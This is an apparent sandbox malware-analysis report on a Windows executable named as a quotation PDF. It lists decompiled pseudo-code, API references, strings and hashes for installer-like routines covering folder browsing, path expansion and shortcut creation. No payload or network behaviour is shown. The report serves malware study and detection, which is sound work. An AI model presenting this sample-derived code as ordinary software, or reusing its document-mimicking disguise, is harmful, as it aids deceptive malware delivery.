GetDlgItem.USER32 ref: 00404789
GetDlgItem.USER32 ref: 00404796
GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
LoadBitmapA.USER32 ref: 004047F5
SetWindowLongA.USER32 ref: 0040480F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
SendMessageA.USER32 ref: 0040484C
SendMessageA.USER32 ref: 00404858
SendMessageA.USER32 ref: 0040486A
DeleteObject.GDI32(?), ref: 0040486F
SendMessageA.USER32 ref: 0040489A
SendMessageA.USER32 ref: 004048A6
SendMessageA.USER32 ref: 0040493B
SendMessageA.USER32 ref: 00404966
SendMessageA.USER32 ref: 0040497A
GetWindowLongA.USER32 ref: 004049A9
SetWindowLongA.USER32 ref: 004049B7
ShowWindow.USER32(?,00000005), ref: 004049C8
SendMessageA.USER32 ref: 00404ACB
SendMessageA.USER32 ref: 00404B30
SendMessageA.USER32 ref: 00404B45
SendMessageA.USER32 ref: 00404B69
SendMessageA.USER32 ref: 00404B8F
ImageList_Destroy.COMCTL32(?), ref: 00404BA4
GlobalFree.KERNEL32 ref: 00404BB4
SendMessageA.USER32 ref: 00404C24
SendMessageA.USER32 ref: 00404CCD
SendMessageA.USER32 ref: 00404CDC
InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
ShowWindow.USER32(?,00000000), ref: 00404D4A
GetDlgItem.USER32 ref: 00404D55
ShowWindow.USER32(00000000), ref: 00404D5C

Strings

N, xrefs: 00404A06
M, xrefs: 00404922
, xrefs: 00404D34

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404275, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x0040427b
0x00404282
0x0040428e
0x0040429c
0x004042a4
0x004042a8
0x004042ae
0x004042ae
0x004042ba
0x0040432e
0x00404335
0x0040440a
0x00404411
0x00404420
0x00404420
0x00404424
0x0040442a
0x00404437
0x00404439
0x00404439
0x00404447
0x0040444c
0x0040444f
0x00404456
0x00404459
0x00404490
0x00404492
0x00404498
0x0040449f
0x004044a1
0x004044a1
0x004044bd
0x004044f9
0x00000000
0x004044bf
0x004044c2
0x004044d6
0x004044d8
0x00000000
0x004044d8
0x0040445b
0x0040445f
0x0040448e
0x0040448e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404461
0x00404461
0x0040446e
0x00404473
0x00000000
0x00000000
0x00404477
0x00404479
0x00404479
0x00404484
0x00404487
0x0040448c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040448c
0x004044e7
0x004044ee
0x004044f5
0x004044fc
0x004044fc
0x00404501
0x00404503
0x0040450b
0x00404511
0x00404511
0x00404521
0x0040452b
0x00404533
0x00404549
0x00404535
0x00404539
0x00404539
0x00404533
0x0040454e
0x00404553
0x00404558
0x00404561
0x00404561
0x0040456a
0x0040456c
0x0040456c
0x00404578
0x00404580
0x0040458a
0x0040458a
0x0040458f
0x00000000
0x0040458f
0x00404459
0x00404413
0x0040441a
0x00000000
0x00000000
0x00000000
0x0040441a
0x0040433b
0x00404341
0x0040435b
0x00404360
0x0040436a
0x00404371
0x00404380
0x00404383
0x00404386
0x0040438d
0x00404395
0x00404398
0x0040439c
0x004043a3
0x004043ab
0x00404403
0x004043ad
0x004043ae
0x004043b5
0x004043bf
0x004043c7
0x004043d4
0x004043e8
0x004043ec
0x004043ec
0x004043e8
0x004043f1
0x004043fc
0x004043fc
0x004043ab
0x00000000
0x00404360
0x0040434e
0x00000000
0x00000000
0x00404354
0x00000000
0x004042bc
0x004042bc
0x004042c8
0x004042d2
0x004042df
0x004042df
0x004042e5
0x004042ee
0x004042f7
0x004042fa
0x004042fd
0x00404305
0x00404308
0x0040430b
0x00404313
0x0040431a
0x00404321
0x00404595
0x004045a7
0x004045a7
0x0040432c
0x00000000
0x0040432c

APIs

GetDlgItem.USER32 ref: 004042C1
SetWindowTextA.USER32(?,?), ref: 004042EE
SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
CoTaskMemFree.OLE32(00000000), ref: 004043AE
lstrcmpiA.KERNEL32(rqfvwfvs,00420498,00000000,?,?), ref: 004043E0
lstrcatA.KERNEL32(?,rqfvwfvs), ref: 004043EC
SetDlgItemTextA.USER32 ref: 004043FC

Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
SetDlgItemTextA.USER32 ref: 00404549

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004043C9
A, xrefs: 0040439C
rqfvwfvs, xrefs: 004043DA, 004043DF, 004043EA

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$rqfvwfvs
API String ID: 2246997448-943257640
Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}

0x00405aa7
0x00405aa7
0x00405aa7
0x00405aad
0x00405ab2
0x00405ac3
0x00405ac3
0x00405ace
0x00405ad0
0x00405ad5
0x00405ad8
0x00405ad9
0x00405ae0
0x00405ae2
0x00405ae8
0x00405aeb
0x00405aeb
0x00405cc0
0x00405cc0
0x00405cc4
0x00000000
0x00000000
0x00405af8
0x00405afe
0x00000000
0x00000000
0x00405b04
0x00405b05
0x00405b08
0x00405b0b
0x00405cb3
0x00405cbd
0x00405cbf
0x00405cbf
0x00405cb5
0x00405cb7
0x00405cb9
0x00405cba
0x00405cba
0x00000000
0x00405cb3
0x00405b11
0x00405b15
0x00405b1a
0x00405b29
0x00405b2c
0x00405b2e
0x00405b33
0x00405b36
0x00405b39
0x00405b3c
0x00405b3f
0x00405b42
0x00405c5d
0x00405c60
0x00405c90
0x00405c93
0x00405c98
0x00405c9c
0x00405c9c
0x00405ca1
0x00405ca2
0x00405ca7
0x00405caa
0x00405cac
0x00000000
0x00405cac
0x00405c62
0x00405c65
0x00405c7a
0x00405c81
0x00405c67
0x00405c6e
0x00405c6e
0x00405c89
0x00405c8c
0x00405c55
0x00405c56
0x00405c56
0x00000000
0x00405c8c
0x00405b4a
0x00405b4b
0x00405b51
0x00405b53
0x00405b6d
0x00405b6d
0x00405b74
0x00405b74
0x00405b7b
0x00405b7f
0x00405b7f
0x00405b80
0x00405b82
0x00405bbb
0x00405bbe
0x00405bce
0x00405bd1
0x00405bd9
0x00405bdf
0x00405bdf
0x00405c3b
0x00405c3b
0x00405c3d
0x00000000
0x00000000
0x00405be3
0x00405bea
0x00405beb
0x00405bed
0x00405c07
0x00405c15
0x00405c1b
0x00405c1d
0x00405c38
0x00405c38
0x00405c38
0x00000000
0x00405c38
0x00405c23
0x00405c2e
0x00405c34
0x00405c36
0x00000000
0x00000000
0x00000000
0x00405c36
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405c01
0x00405c03
0x00405c05
0x00000000
0x00000000
0x00000000
0x00405c05
0x00000000
0x00405c3b
0x00405bc6
0x00000000
0x00405b84
0x00405b89
0x00405b9f
0x00405ba4
0x00405ba7
0x00405c44
0x00405c44
0x00405c48
0x00405c50
0x00405c50
0x00000000
0x00405c48
0x00405bb1
0x00405c3f
0x00405c3f
0x00405c42
0x00000000
0x00000000
0x00000000
0x00405c42
0x00405b82
0x00405b55
0x00405b59
0x00000000
0x00000000
0x00405b5b
0x00405b5f
0x00000000
0x00000000
0x00405b61
0x00405b65
0x00000000
0x00405b67
0x00405b67
0x00000000
0x00405b67
0x00405b65
0x00405cca
0x00405cd4
0x00405ce0
0x00405ce0
0x00000000

APIs

GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
GetSystemDirectoryA.KERNEL32 ref: 00405BC6
GetWindowsDirectoryA.KERNEL32(rqfvwfvs,00000400), ref: 00405BD9
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
SHGetPathFromIDListA.SHELL32(00000000,rqfvwfvs), ref: 00405C23
CoTaskMemFree.OLE32(00000000), ref: 00405C2E
lstrcatA.KERNEL32(rqfvwfvs,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
lstrlenA.KERNEL32(rqfvwfvs,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C4A
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B95
rqfvwfvs, xrefs: 00405AD0, 00405B93, 00405BB0, 00405BC5, 00405BD8, 00405BF4, 00405C1F, 00405C4F, 00405C55, 00405C6D, 00405C80, 00405C9B, 00405CA1, 00405CAC, 00405CD6

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$rqfvwfvs
API String ID: 900638850-374732695
Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040201b
0x00402025
0x0040202e
0x00402038
0x00402041
0x0040204b
0x0040204f
0x0040204f
0x00402054
0x00402065
0x0040206d
0x0040214d
0x0040214d
0x00402154
0x00402073
0x00402073
0x00402084
0x00402088
0x0040208e
0x00402098
0x0040209a
0x004020a5
0x004020a8
0x004020b5
0x004020b7
0x004020b9
0x004020c0
0x004020c3
0x004020c3
0x004020c6
0x004020d0
0x004020d8
0x004020dd
0x004020e9
0x004020e9
0x004020ec
0x004020f5
0x004020f8
0x00402101
0x00402106
0x00402118
0x00402127
0x00402129
0x00402135
0x00402135
0x00402127
0x00402137
0x0040213d
0x0040213d
0x00402140
0x00402146
0x0040214b
0x00402160
0x00000000
0x00000000
0x00000000
0x0040214b
0x00402156
0x00402880
0x0040288c

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-1943935188
